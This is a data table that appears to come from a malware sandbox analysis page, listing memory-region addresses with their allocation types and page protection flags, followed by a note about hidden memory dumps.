2050FB76000
|
heap
|
page read and write
|
||
|
82C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
ED5CBFD000
|
stack
|
page read and write
|
||
|
2050FB44000
|
heap
|
page read and write
|
||
|
7FFD9B8C0000
|
trusted library allocation
|
page read and write
|
||
|
29F0000
|
trusted library allocation
|
page read and write
|
||
|
2050FB30000
|
heap
|
page read and write
|
||
|
2CC9D220000
|
heap
|
page read and write
|
||
|
7FFD9B5E2000
|
trusted library allocation
|
page read and write
|
||
|
20511810000
|
heap
|
page read and write
|
||
|
20511816000
|
heap
|
page read and write
|
||
|
2050FB69000
|
heap
|
page read and write
|
||
|
46A9000
|
trusted library allocation
|
page read and write
|
||
|
2CC831D5000
|
heap
|
page read and write
|
||
|
27FE5FE000
|
stack
|
page read and write
|
||
|
2CC9D3D8000
|
heap
|
page read and write
|
||
|
7FFD9B7E0000
|
trusted library allocation
|
page read and write
|
||
|
2050FB55000
|
heap
|
page read and write
|
||
|
ED5DD0D000
|
stack
|
page read and write
|
||
|
6B50000
|
heap
|
page read and write
|
||
|
4378000
|
trusted library allocation
|
page read and write
|
||
|
7DE0000
|
trusted library allocation
|
page read and write
|
||
|
7260000
|
trusted library allocation
|
page read and write
|
||
|
70BB000
|
heap
|
page read and write
|
||
|
7CF0000
|
trusted library allocation
|
page read and write
|
||
|
8390000
|
direct allocation
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
|
2A84000
|
heap
|
page read and write
|
||
|
7240000
|
trusted library allocation
|
page read and write
|
||
|
80E5000
|
heap
|
page read and write
|
||
|
82A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
24DE8F90000
|
heap
|
page read and write
|
||
|
20511827000
|
heap
|
page read and write
|
||
|
6FD9000
|
heap
|
page read and write
|
||
|
7F70000
|
trusted library allocation
|
page read and write
|
||
|
6FE9000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
72E0000
|
trusted library allocation
|
page read and write
|
||
|
2050FD2B000
|
heap
|
page read and write
|
||
|
2CC84C70000
|
heap
|
page read and write
|
||
|
4E0A000
|
trusted library allocation
|
page read and write
|
||
|
2050FD28000
|
heap
|
page read and write
|
||
|
720D000
|
stack
|
page read and write
|
||
|
6FD0000
|
heap
|
page read and write
|
||
|
29E4000
|
trusted library allocation
|
page read and write
|
||
|
2050FBC9000
|
heap
|
page read and write
|
||
|
ED5D13C000
|
stack
|
page read and write
|
||
|
2CC9D33C000
|
heap
|
page read and write
|
||
|
4390000
|
trusted library allocation
|
page execute and read and write
|
||
|
2050FB7B000
|
heap
|
page read and write
|
||
|
7CD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
70AA000
|
heap
|
page read and write
|
||
|
2050FA50000
|
heap
|
page read and write
|
||
|
27FEDFB000
|
stack
|
page read and write
|
||
|
20511830000
|
heap
|
page read and write
|
||
|
2050FB56000
|
heap
|
page read and write
|
||
|
7FFD9B7F0000
|
trusted library allocation
|
page read and write
|
||
|
2050FB79000
|
heap
|
page read and write
|
||
|
2CC83191000
|
heap
|
page read and write
|
||
|
2CC94F8C000
|
trusted library allocation
|
page read and write
|
||
|
2CC83330000
|
trusted library allocation
|
page read and write
|
||
|
6A05000
|
heap
|
page execute and read and write
|
||
|
7FFD9B7B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2051181E000
|
heap
|
page read and write
|
||
|
ED5CB7E000
|
stack
|
page read and write
|
||
|
24DE9090000
|
heap
|
page read and write
|
||
|
2050FB56000
|
heap
|
page read and write
|
||
|
7FFD9B5E3000
|
trusted library allocation
|
page execute and read and write
|
||
|
ED5CAFE000
|
stack
|
page read and write
|
||
|
2050FB5F000
|
heap
|
page read and write
|
||
|
2CC9D0D0000
|
heap
|
page read and write
|
||
|
27FECFE000
|
stack
|
page read and write
|
||
|
2050FD27000
|
heap
|
page read and write
|
||
|
7FFD9B791000
|
trusted library allocation
|
page read and write
|
||
|
82D0000
|
trusted library allocation
|
page read and write
|
||
|
6FF1000
|
heap
|
page read and write
|
||
|
2CC83300000
|
trusted library allocation
|
page read and write
|
||
|
2CC9D149000
|
heap
|
page read and write
|
||
|
2CC85103000
|
trusted library allocation
|
page read and write
|
||
|
2CC9D1CD000
|
heap
|
page read and write
|
||
|
2050FB49000
|
heap
|
page read and write
|
||
|
7FFD9B79A000
|
trusted library allocation
|
page read and write
|
||
|
2CC832C0000
|
heap
|
page read and write
|
||
|
20511843000
|
heap
|
page read and write
|
||
|
7FBC000
|
stack
|
page read and write
|
||
|
ED5D0BE000
|
stack
|
page read and write
|
||
|
2CC8590B000
|
trusted library allocation
|
page read and write
|
||
|
7FFC000
|
stack
|
page read and write
|
||
|
80FB000
|
heap
|
page read and write
|
||
|
7035000
|
heap
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7C7000
|
trusted library allocation
|
page read and write
|
||
|
9FB5000
|
direct allocation
|
page execute and read and write
|
||
|
20511834000
|
heap
|
page read and write
|
||
|
20511825000
|
heap
|
page read and write
|
||
|
2050FD28000
|
heap
|
page read and write
|
||
|
2CC9D41E000
|
heap
|
page read and write
|
||
|
24DE90C0000
|
heap
|
page read and write
|
||
|
2910000
|
heap
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
29B0000
|
trusted library section
|
page read and write
|
||
|
80C0000
|
heap
|
page read and write
|
||
|
43A0000
|
trusted library allocation
|
page read and write
|
||
|
2050FB91000
|
heap
|
page read and write
|
||
|
ED5CD7E000
|
stack
|
page read and write
|
||
|
2CC9D240000
|
heap
|
page read and write
|
||
|
2CC86A09000
|
trusted library allocation
|
page read and write
|
||
|
2CC83390000
|
heap
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page read and write
|
||
|
2CC84D07000
|
trusted library allocation
|
page read and write
|
||
|
2051181E000
|
heap
|
page read and write
|
||
|
27FE4FE000
|
stack
|
page read and write
|
||
|
2CC9D10C000
|
heap
|
page read and write
|
||
|
2050FB5F000
|
heap
|
page read and write
|
||
|
80F7000
|
heap
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6C6000
|
trusted library allocation
|
page execute and read and write
|
||
|
47D000
|
stack
|
page read and write
|
||
|
2CC832C6000
|
heap
|
page read and write
|
||
|
2050FB19000
|
heap
|
page read and write
|
||
|
2050FB61000
|
heap
|
page read and write
|
||
|
57E000
|
stack
|
page read and write
|
||
|
2050FD00000
|
heap
|
page read and write
|
||
|
2CC9D324000
|
heap
|
page read and write
|
||
|
2050FB30000
|
heap
|
page read and write
|
||
|
7FFD9B860000
|
trusted library allocation
|
page read and write
|
||
|
20511811000
|
heap
|
page read and write
|
||
|
2050FD20000
|
heap
|
page read and write
|
||
|
F29C4FF000
|
stack
|
page read and write
|
||
|
70B1000
|
heap
|
page read and write
|
||
|
70B6000
|
heap
|
page read and write
|
||
|
7E30000
|
trusted library allocation
|
page read and write
|
||
|
2CC83260000
|
heap
|
page read and write
|
||
|
7D3E000
|
stack
|
page read and write
|
||
|
8000000
|
heap
|
page read and write
|
||
|
72A0000
|
trusted library allocation
|
page read and write
|
||
|
ED5C7DE000
|
stack
|
page read and write
|
||
|
2CC866B8000
|
trusted library allocation
|
page read and write
|
||
|
ED5DC0E000
|
stack
|
page read and write
|
||
|
2CC832E0000
|
trusted library allocation
|
page read and write
|
||
|
2050FB6F000
|
heap
|
page read and write
|
||
|
7DF4CC540000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CC84B40000
|
trusted library allocation
|
page read and write
|
||
|
431E000
|
stack
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
|
ED5C753000
|
stack
|
page read and write
|
||
|
7E10000
|
trusted library allocation
|
page read and write
|
||
|
A9B5000
|
direct allocation
|
page execute and read and write
|
||
|
2A30000
|
trusted library allocation
|
page read and write
|
||
|
2050FB5B000
|
heap
|
page read and write
|
||
|
7270000
|
trusted library allocation
|
page read and write
|
||
|
2CC83186000
|
heap
|
page read and write
|
||
|
6A00000
|
heap
|
page execute and read and write
|
||
|
7FFD9B5ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B7C2000
|
trusted library allocation
|
page read and write
|
||
|
43C000
|
stack
|
page read and write
|
||
|
24DE9210000
|
heap
|
page read and write
|
||
|
8BB5000
|
direct allocation
|
page execute and read and write
|
||
|
6E7E000
|
stack
|
page read and write
|
||
|
7220000
|
trusted library allocation
|
page execute and read and write
|
||
|
2050FA70000
|
heap
|
page read and write
|
||
|
F29C3FF000
|
unkown
|
page read and write
|
||
|
70D0000
|
heap
|
page execute and read and write
|
||
|
ED5CFBA000
|
stack
|
page read and write
|
||
|
2050FD2C000
|
heap
|
page read and write
|
||
|
2CC86A22000
|
trusted library allocation
|
page read and write
|
||
|
20511811000
|
heap
|
page read and write
|
||
|
2916000
|
heap
|
page read and write
|
||
|
2CC831CF000
|
heap
|
page read and write
|
||
|
2050FB57000
|
heap
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5F0000
|
trusted library allocation
|
page read and write
|
||
|
7CC7000
|
stack
|
page read and write
|
||
|
2CC94F7C000
|
trusted library allocation
|
page read and write
|
||
|
24DE90CB000
|
heap
|
page read and write
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
2CC8630B000
|
trusted library allocation
|
page read and write
|
||
|
2050FAF0000
|
heap
|
page read and write
|
||
|
2CC84C81000
|
trusted library allocation
|
page read and write
|
||
|
2050FB64000
|
heap
|
page read and write
|
||
|
2050FBD6000
|
heap
|
page read and write
|
||
|
27FEAFD000
|
stack
|
page read and write
|
||
|
2050FD2E000
|
heap
|
page read and write
|
||
|
24DE9220000
|
heap
|
page read and write
|
||
|
2050FB36000
|
heap
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
24DE90E9000
|
heap
|
page read and write
|
||
|
718E000
|
stack
|
page read and write
|
||
|
2CC83290000
|
heap
|
page read and write
|
||
|
2050FBBC000
|
heap
|
page read and write
|
||
|
24DE90E6000
|
heap
|
page read and write
|
||
|
72C0000
|
trusted library allocation
|
page read and write
|
||
|
7DB0000
|
heap
|
page read and write
|
||
|
2CC8321D000
|
heap
|
page read and write
|
||
|
2CC9D660000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B600000
|
trusted library allocation
|
page read and write
|
||
|
ED5CCFE000
|
stack
|
page read and write
|
||
|
2050FBA2000
|
heap
|
page read and write
|
||
|
2050FB5B000
|
heap
|
page read and write
|
||
|
2CC9D367000
|
heap
|
page read and write
|
||
|
29E3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AEB000
|
heap
|
page read and write
|
||
|
2A12000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
ED5CDF8000
|
stack
|
page read and write
|
||
|
2CC858FC000
|
trusted library allocation
|
page read and write
|
||
|
2CC858E2000
|
trusted library allocation
|
page read and write
|
||
|
4E22000
|
trusted library allocation
|
page read and write
|
||
|
7210000
|
trusted library allocation
|
page read and write
|
||
|
2CC9D363000
|
heap
|
page read and write
|
||
|
2050FB50000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
2050FB1E000
|
heap
|
page read and write
|
||
|
29F9000
|
trusted library allocation
|
page read and write
|
||
|
29E0000
|
trusted library allocation
|
page read and write
|
||
|
2CC83240000
|
heap
|
page read and write
|
||
|
2051181E000
|
heap
|
page read and write
|
||
|
2050FD2C000
|
heap
|
page read and write
|
||
|
2050FD2C000
|
heap
|
page read and write
|
||
|
2050FB91000
|
heap
|
page read and write
|
||
|
70F8000
|
trusted library allocation
|
page read and write
|
||
|
53F000
|
stack
|
page read and write
|
||
|
478000
|
stack
|
page read and write
|
||
|
7D7F000
|
stack
|
page read and write
|
||
|
7FFD9B69C000
|
trusted library allocation
|
page execute and read and write
|
||
|
6EBF000
|
stack
|
page read and write
|
||
|
2050FB7E000
|
heap
|
page read and write
|
||
|
2050FB91000
|
heap
|
page read and write
|
||
|
6B60000
|
heap
|
page read and write
|
||
|
ED5CC7E000
|
stack
|
page read and write
|
||
|
7230000
|
trusted library allocation
|
page read and write
|
||
|
8400000
|
trusted library allocation
|
page execute and read and write
|
||
|
ED5CE3E000
|
stack
|
page read and write
|
||
|
2050FAF7000
|
heap
|
page read and write
|
||
|
2CC9D200000
|
heap
|
page execute and read and write
|
||
|
444E000
|
stack
|
page read and write
|
||
|
435E000
|
stack
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page execute and read and write
|
||
|
20511818000
|
heap
|
page read and write
|
||
|
2CC8318B000
|
heap
|
page read and write
|
||
|
7FFD9B63C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CC852D0000
|
trusted library allocation
|
page read and write
|
||
|
4E2A000
|
trusted library allocation
|
page read and write
|
||
|
5579000
|
trusted library allocation
|
page read and write
|
||
|
20511826000
|
heap
|
page read and write
|
||
|
2CC83320000
|
heap
|
page execute and read and write
|
||
|
2050FB1A000
|
heap
|
page read and write
|
||
|
2CC84B70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5E4000
|
trusted library allocation
|
page read and write
|
||
|
7F2E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page read and write
|
||
|
2CC83367000
|
heap
|
page execute and read and write
|
||
|
6EE2000
|
heap
|
page read and write
|
||
|
ED5CEB7000
|
stack
|
page read and write
|
||
|
2CC854FF000
|
trusted library allocation
|
page read and write
|
||
|
2A78000
|
heap
|
page read and write
|
||
|
29C0000
|
trusted library section
|
page read and write
|
||
|
2CC9D19F000
|
heap
|
page read and write
|
||
|
8380000
|
direct allocation
|
page read and write
|
||
|
7FFD9B7D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2050FD29000
|
heap
|
page read and write
|
||
|
55C1000
|
trusted library allocation
|
page read and write
|
||
|
82B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
2051181E000
|
heap
|
page read and write
|
||
|
7DA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2051182A000
|
heap
|
page read and write
|
||
|
2050FB4E000
|
heap
|
page read and write
|
||
|
2CC9D1B6000
|
heap
|
page read and write
|
||
|
2050FB7E000
|
heap
|
page read and write
|
||
|
298C000
|
heap
|
page read and write
|
||
|
2AD1000
|
heap
|
page read and write
|
||
|
20511826000
|
heap
|
page read and write
|
||
|
29D0000
|
trusted library allocation
|
page read and write
|
||
|
27FE1DA000
|
stack
|
page read and write
|
||
|
72D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
2CC9D3CD000
|
heap
|
page read and write
|
||
|
2A00000
|
trusted library allocation
|
page read and write
|
||
|
7DD0000
|
heap
|
page read and write
|
||
|
440C000
|
stack
|
page read and write
|
||
|
2050FB6F000
|
heap
|
page read and write
|
||
|
71CE000
|
stack
|
page read and write
|
||
|
2CC9D320000
|
heap
|
page read and write
|
||
|
20511811000
|
heap
|
page read and write
|
||
|
7FFD9B690000
|
trusted library allocation
|
page read and write
|
||
|
27FE8FE000
|
stack
|
page read and write
|
||
|
2CC850F8000
|
trusted library allocation
|
page read and write
|
||
|
8107000
|
heap
|
page read and write
|
||
|
2050FBA5000
|
heap
|
page read and write
|
||
|
70F0000
|
trusted library allocation
|
page read and write
|
||
|
ED5DC8E000
|
stack
|
page read and write
|
||
|
2A0A000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CC83310000
|
heap
|
page readonly
|
||
|
72F0000
|
trusted library allocation
|
page read and write
|
||
|
2050F970000
|
heap
|
page read and write
|
||
|
2050FB91000
|
heap
|
page read and write
|
||
|
2CC9D3C3000
|
heap
|
page read and write
|
||
|
2CC83050000
|
heap
|
page read and write
|
||
|
2A4E000
|
heap
|
page read and write
|
||
|
80A0000
|
heap
|
page read and write
|
||
|
2050FBBF000
|
heap
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
|
2919000
|
heap
|
page read and write
|
||
|
5551000
|
trusted library allocation
|
page read and write
|
||
|
2CC83219000
|
heap
|
page read and write
|
||
|
ED5CF38000
|
stack
|
page read and write
|
||
|
2CC84EA8000
|
trusted library allocation
|
page read and write
|
||
|
2A40000
|
heap
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
2CC858C8000
|
trusted library allocation
|
page read and write
|
||
|
29ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
2050FB7E000
|
heap
|
page read and write
|
||
|
2CC8510B000
|
trusted library allocation
|
page read and write
|
||
|
2050FD25000
|
heap
|
page read and write
|
||
|
55B8000
|
trusted library allocation
|
page read and write
|
||
|
2CC9D330000
|
heap
|
page read and write
|
||
|
2CC851DE000
|
trusted library allocation
|
page read and write
|
||
|
4551000
|
trusted library allocation
|
page read and write
|
||
|
714E000
|
stack
|
page read and write
|
||
|
7FFD9B5FB000
|
trusted library allocation
|
page read and write
|
||
|
2CC94F6D000
|
trusted library allocation
|
page read and write
|
||
|
2990000
|
heap
|
page read and write
|
||
|
7DF0000
|
trusted library allocation
|
page read and write
|
||
|
7CE0000
|
trusted library allocation
|
page read and write
|
||
|
2CC9D429000
|
heap
|
page read and write
|
||
|
2050FBC2000
|
heap
|
page read and write
|
||
|
ED5D03B000
|
stack
|
page read and write
|
||
|
27FEBFE000
|
stack
|
page read and write
|
||
|
2050FB6A000
|
heap
|
page read and write
|
||
|
8131000
|
heap
|
page read and write
|
||
|
7280000
|
trusted library allocation
|
page read and write
|
||
|
8360000
|
trusted library allocation
|
page read and write
|
||
|
43C0000
|
heap
|
page read and write
|
||
|
43C9000
|
heap
|
page read and write
|
||
|
2051181E000
|
heap
|
page read and write
|
||
|
7FFD9B700000
|
trusted library allocation
|
page execute and read and write
|
||
|
4540000
|
heap
|
page read and write
|
||
|
20511834000
|
heap
|
page read and write
|
||
|
2050FBDB000
|
heap
|
page read and write
|
There are 396 hidden memdumps, click here to show them.